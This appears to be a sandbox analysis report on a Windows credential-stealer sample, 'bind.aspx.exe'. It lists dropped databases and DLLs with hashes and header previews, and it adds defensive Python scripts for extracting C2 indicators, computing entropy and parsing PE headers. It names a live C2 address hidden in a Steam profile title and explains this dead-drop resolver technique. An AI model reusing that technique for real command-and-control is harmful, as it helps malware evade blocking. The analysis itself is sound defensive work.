                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\Desktop\bind.aspx.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.1215420383712111
Encrypted: false
SSDEEP: 384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5: 9A809AD8B1FDDA60760BB6253358A1DB
SHA1: D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256: 95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512: 2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious: false
                                                                                                                                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):155648
                                                                                                                                                                                    Entropy (8bit):0.5407252242845243
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                    MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                    SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                    SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                    SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):159744
                                                                                                                                                                                    Entropy (8bit):0.5394293526345721
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                    MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                    SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                    SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                    SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):685392
                                                                                                                                                                                    Entropy (8bit):6.872871740790978
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                    MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                    SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                    SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                    SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                     Joe Sandbox View:
                                                                                                                                                                                     • Filename: file.exe, Detection: malicious (seen in 10 other analyses)
                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):608080
                                                                                                                                                                                    Entropy (8bit):6.833616094889818
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                    MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                    SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                    SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                    SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                     Joe Sandbox View:
                                                                                                                                                                                     • Filename: file.exe, Detection: malicious (seen in 10 other analyses)
                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):450024
                                                                                                                                                                                    Entropy (8bit):6.673992339875127
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                    MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                    SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                    SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                    SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2046288
                                                                                                                                                                                    Entropy (8bit):6.787733948558952
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                    MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                    SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                    SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                    SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):257872
                                                                                                                                                                                    Entropy (8bit):6.727482641240852
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                    MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                    SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                    SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                    SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):80880
                                                                                                                                                                                    Entropy (8bit):6.920480786566406
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                    MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                    SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                    SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                    SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):34730
                                                                                                                                                                                    Entropy (8bit):5.39953096398384
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:3dpqme0Ih3tAA6WGAsfcDAVTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2S8:3d8me0Ih3tAA6WGAsFVTBv++nIjBtPFB
                                                                                                                                                                                    MD5:6C9824452D933009C8A087BF0479C611
                                                                                                                                                                                    SHA1:10CD2BC4C437CB7DDC6139C773758CEDF7B74E46
                                                                                                                                                                                    SHA-256:DAAC0F9ACED9D8CE794E9E4DFDE18351633260EA5A81EF732FA9F5A0560D14C0
                                                                                                                                                                                    SHA-512:20AA85167D8DA74522D319FF5F0B49C4B7806AA60E1D73AF1906044D35AE6A065A568803B1420A0E264B7BF443AFE3124D542D57D91C5E9EED31FD13B1E22726
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: b@b# https://135.181.31.18|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link hre
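The dropped HTML above is a Steam Community profile page whose title reads "Steam Community :: b@b# https://135.181.31.18|": the sample fetches a legitimate site and reads its real C2 address out of the profile name, so the URL compiled into the binary stays benign and the operator can repoint the C2 by editing the profile. This is the dead-drop resolver pattern used by Vidar and related stealers. The script below is an added example, not part of the report or of the sample; it consumes a constructed excerpt of the dropped page (the title is the one shown in the preview, the other elements stand in for the rest of the Steam markup) and pulls the indicator out of the <title> only, so the page's own steamstatic.com asset links are never mistaken for C2.

```python
import html
import ipaddress
import re
from urllib.parse import urlparse

# Constructed excerpt of the dropped "Steam Community" page: the <title> is the
# one shown in the report preview above; the other lines stand in for the rest
# of the (legitimate) Steam markup.
STEAM_PROFILE_HTML = (
    '<!DOCTYPE html>\n<html class=" responsive" lang="en">\n<head>\n'
    '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">\n'
    '<title>Steam Community :: b@b# https://135.181.31.18|</title>\n'
    '<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">\n'
    '<link href="https://community.akamai.steamstatic.com/public/shared/css/'
    'motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >\n'
    '</head>\n'
)

TITLE_RE = re.compile(r"<title>(.*?)</title>", re.IGNORECASE | re.DOTALL)
URL_RE = re.compile(r"https?://[^\s|<>\"']+")
TITLE_PREFIX = "Steam Community :: "


def steam_profile_name(page):
    """The persona name Steam puts in the <title>; None if there is no title."""
    m = TITLE_RE.search(page)
    if not m:
        return None
    title = html.unescape(m.group(1)).strip()
    return title[len(TITLE_PREFIX):] if title.startswith(TITLE_PREFIX) else title


def extract_dead_drop_c2(page):
    """URLs embedded in the profile name. Only the <title> is consulted, so the
    page's own asset links (steamstatic.com CSS etc.) are never reported."""
    name = steam_profile_name(page)
    if not name:
        return []
    # In this sample the embedded URL is terminated by '|'; take what precedes it.
    return URL_RE.findall(name.split("|")[0])


def c2_indicators(page):
    """Per-URL record with the host and whether it is a bare IP literal."""
    records = []
    for url in extract_dead_drop_c2(page):
        host = urlparse(url).hostname or ""
        try:
            ipaddress.ip_address(host)
            ip_literal = True
        except ValueError:
            ip_literal = False
        records.append({"url": url, "host": host, "ip_literal": ip_literal})
    return records


if __name__ == "__main__":
    for rec in c2_indicators(STEAM_PROFILE_HTML):
        print(rec)
```

Run against the real dropped file (C:\ProgramData\... in the report) the same functions apply unchanged; the point of keying on the title is that a blocklist built from every URL in the page would be dominated by Steam's own CDN links.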
                                                                                                                                                                                    Process:C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    File Type:ISO-8859 text, with very long lines (65536), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1048575
                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:fTf/:L
                                                                                                                                                                                    MD5:26E35B97CC5212411DF1A6E8C470C458
                                                                                                                                                                                    SHA1:E76AE58004DD441E3EAD02C8B20AF289B14E00AA
                                                                                                                                                                                    SHA-256:6295A461F9AA64507FA474B3C5262B862654D9D6F750360B06F67F83B814DE61
                                                                                                                                                                                    SHA-512:81B1255AF30EDA42BE3FDDCF2B989648410F839B16BC1A7377D50E0DE79CE54BE2A39B1B75A3DAB8463F8491DA7F50387BBE23C1679B3703CAC185F853F1407C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
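Each dropped file above carries an "Entropy (8bit)" figure. The DLLs sit between 6.7 and 6.9, which is the normal range for unpacked compiled code, while the 1,048,575-byte file immediately above scores exactly 0.0: an entropy of zero means every byte in the file has the same value, which is also why its SSDEEP collapses to a three-character block. The function below is an added example (not part of the report) showing how that number is computed and how it is commonly bucketed during triage; the bucket thresholds are the usual rule of thumb, not values taken from the report, and both inputs are constructed.

```python
import math
from collections import Counter


def shannon_entropy(data):
    """Shannon entropy in bits per byte: 0.0 when every byte is the same value,
    8.0 when all 256 values are equally frequent. This is the 'Entropy (8bit)'
    figure the report prints for each file."""
    n = len(data)
    if n == 0:
        return 0.0
    ent = -sum(c / n * math.log2(c / n) for c in Counter(data).values())
    return 0.0 if ent == 0 else ent      # normalise -0.0 from the single-symbol case


def triage_entropy(data):
    """Bucket a blob by entropy. Thresholds are the usual triage rule of thumb,
    not figures taken from the report."""
    ent = shannon_entropy(data)
    if ent < 1.0:
        label = "single value / filler"
    elif ent < 7.2:
        label = "plain text or ordinary compiled code"
    else:
        label = "compressed, encrypted or packed"
    return ent, label


# Constructed inputs: a 1,048,575-byte run of one value (same size and entropy
# as the 0.0-entropy dropped file above) and a perfectly uniform byte stream.
FILLER = b"\x20" * 1048575
UNIFORM = bytes(range(256)) * 16

if __name__ == "__main__":
    for name, blob in (("filler", FILLER), ("uniform", UNIFORM)):
        ent, label = triage_entropy(blob)
        print(f"{name}: {ent:.3f} bits/byte, {label}")
```

Entropy is a coarse signal: a packed PE usually shows a high-entropy section next to a low-entropy stub, so the per-file figure is most useful when read alongside the section layout in the preview bytes.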
                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Entropy (8bit):6.803977435313322
                                                                                                                                                                                    TrID:
                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                    File name:bind.aspx.exe
                                                                                                                                                                                    File size:5'424'128 bytes
                                                                                                                                                                                    MD5:9c49281d063296a545c79bf288d4c3bf
                                                                                                                                                                                    SHA1:403babf2b5811ba796517ce45235d261ad858620
                                                                                                                                                                                    SHA256:3a29214c3a66734c4213be2307f42e30568548e4f0493eb246be3cdc1345ceb1
                                                                                                                                                                                    SHA512:373554c2a6fc6625a0f0154cb17d15bc08117002d95f0c477e0646d44eceb6e9b2ac24f871bd5b402e06db2b9feb7e54379b1b9671c8e5bed2b1e7368591eda0
                                                                                                                                                                                    SSDEEP:98304:Q4Po4Zx7ojYK3zPfNsnigfraV3/x21RNPa9SeR7Tf8J1Q+SS5/nO8:QOxkMK3zPCniYGV48eSS5vO8
                                                                                                                                                                                    TLSH:D546BE02EA8654B6E84721B2754EA37F0D30A6315B32CAC7D7C45DA89F726D2533E70B
                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d.]. .3. .3. .3.O...+.3.O.....3.)...%.3.).....3...2.#.3. .2...3.O.....3.O...!.3.Rich .3.........PE..L......f...................
                                                                                                                                                                                    Icon Hash:00928e8e8686b000
                                                                                                                                                                                    Entrypoint:0x41549f
                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                    Time Stamp:0x66C996B8 [Sat Aug 24 08:15:52 2024 UTC]
                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                    OS Version Major:5
                                                                                                                                                                                    OS Version Minor:1
                                                                                                                                                                                    File Version Major:5
                                                                                                                                                                                    File Version Minor:1
                                                                                                                                                                                    Subsystem Version Major:5
                                                                                                                                                                                    Subsystem Version Minor:1
                                                                                                                                                                                    Import Hash:7b5a8d7a6a007050bb3907e879153095
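The static fields above come straight out of the PE headers: the Time Stamp is IMAGE_FILE_HEADER.TimeDateStamp (0x66C996B8, which decodes to the stated Sat Aug 24 08:15:52 2024 UTC; it is writable by the builder, so treat it as a hint rather than a fact), the Entrypoint is Imagebase plus AddressOfEntryPoint, and the two characteristics lines are bit flags. Reading them as flags makes one absence visible that the list does not spell out: DLL Characteristics contains DYNAMIC_BASE and TERMINAL_SERVER_AWARE but not NX_COMPAT, so the image does not opt into DEP, and it is unsigned. The parser below is an added example, not code from the report; it decodes those fields from a PE32 header and is fed a constructed header that carries the values listed above for bind.aspx.exe (it is not bytes from the sample).

```python
import struct
from datetime import datetime, timezone

FILE_CHARACTERISTICS = {0x0002: "EXECUTABLE_IMAGE", 0x0020: "LARGE_ADDRESS_AWARE",
                        0x0100: "32BIT_MACHINE", 0x2000: "DLL"}
DLL_CHARACTERISTICS = {0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE",
                       0x0080: "FORCE_INTEGRITY", 0x0100: "NX_COMPAT",
                       0x0400: "NO_SEH", 0x4000: "GUARD_CF",
                       0x8000: "TERMINAL_SERVER_AWARE"}
SUBSYSTEM = {1: "native", 2: "windows gui", 3: "windows cui"}


def flags(value, table):
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe32(data):
    """Decode the header fields the report lists for a PE32 (32-bit) image."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    fh = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    machine, nsections, tstamp, _, _, optsize, chars = struct.unpack_from("<HHIIIHH", data, fh)
    oh = fh + 20                                        # IMAGE_OPTIONAL_HEADER32
    (magic,) = struct.unpack_from("<H", data, oh)
    if magic != 0x10B:
        raise ValueError("not PE32 (magic %#x)" % magic)
    (entry_rva,) = struct.unpack_from("<I", data, oh + 16)
    (image_base,) = struct.unpack_from("<I", data, oh + 28)
    os_major, os_minor = struct.unpack_from("<HH", data, oh + 40)
    subsystem, dll_chars = struct.unpack_from("<HH", data, oh + 68)
    when = datetime.fromtimestamp(tstamp, timezone.utc)
    return {
        "timestamp": tstamp,
        "timestamp_utc": when.strftime("%a %b %d %H:%M:%S %Y UTC"),
        "entrypoint": image_base + entry_rva,
        "imagebase": image_base,
        "subsystem": SUBSYSTEM.get(subsystem, hex(subsystem)),
        "os_version": (os_major, os_minor),
        "file_characteristics": flags(chars, FILE_CHARACTERISTICS),
        "dll_characteristics": flags(dll_chars, DLL_CHARACTERISTICS),
        "aslr": bool(dll_chars & 0x0040),   # DYNAMIC_BASE
        "dep": bool(dll_chars & 0x0100),    # NX_COMPAT
    }


def build_sample_header():
    """Constructed header carrying the values the report shows for bind.aspx.exe
    (timestamp, entrypoint, image base, OS version, subsystem, flags). These are
    not bytes from the sample; section table and data are left empty."""
    buf = bytearray(0x200)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)               # e_lfanew
    buf[0x80:0x84] = b"PE\0\0"
    fh = 0x84
    struct.pack_into("<HHIIIHH", buf, fh, 0x14C, 5, 0x66C996B8, 0, 0, 0xE0, 0x0102)
    oh = fh + 20
    struct.pack_into("<H", buf, oh, 0x10B)                # PE32 magic
    struct.pack_into("<I", buf, oh + 16, 0x41549F - 0x400000)
    struct.pack_into("<I", buf, oh + 28, 0x400000)
    struct.pack_into("<HH", buf, oh + 40, 5, 1)
    struct.pack_into("<HH", buf, oh + 68, 2, 0x0040 | 0x8000)
    return bytes(buf)


if __name__ == "__main__":
    for k, v in parse_pe32(build_sample_header()).items():
        print(f"{k}: {v}")
```

On a real file, read the first few kilobytes and pass them in; the same offsets hold for any PE32, and a PE32+ (magic 0x20B) image moves ImageBase to a 64-bit field, which is why the parser refuses it rather than mis-decoding.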
                                                                                                                                                                                    Instruction
                                                                                                                                                                                    push ebp
                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                    sub esp, 30h
                                                                                                                                                                                    push ebx
                                                                                                                                                                                    push esi
                                                                                                                                                                                    push edi
                                                                                                                                                                                    call 00007FDE14BA351Ch
                                                                                                                                                                                    push 000007CEh
                                                                                                                                                                                    call 00007FDE14BA3592h
                                                                                                                                                                                    mov dword ptr [esp], 00421EF8h
                                                                                                                                                                                    call dword ptr [0041E0B4h]
                                                                                                                                                                                    mov ebx, eax
                                                                                                                                                                                    test ebx, ebx
                                                                                                                                                                                    je 00007FDE14BB7996h
                                                                                                                                                                                    mov esi, dword ptr [0041E06Ch]
                                                                                                                                                                                    push 00421EF0h
                                                                                                                                                                                    push ebx
                                                                                                                                                                                    call esi
                                                                                                                                                                                    push 00000014h
                                                                                                                                                                                    pop edi
                                                                                                                                                                                    Programming Language:
                                                                                                                                                                                    • [ASM] VS2010 build 30319
                                                                                                                                                                                    • [ C ] VS2010 build 30319
                                                                                                                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                    • [C++] VS2010 build 30319
                                                                                                                                                                                    • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24ff8 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x739000 | 0xb0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x73a000 | 0x230c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
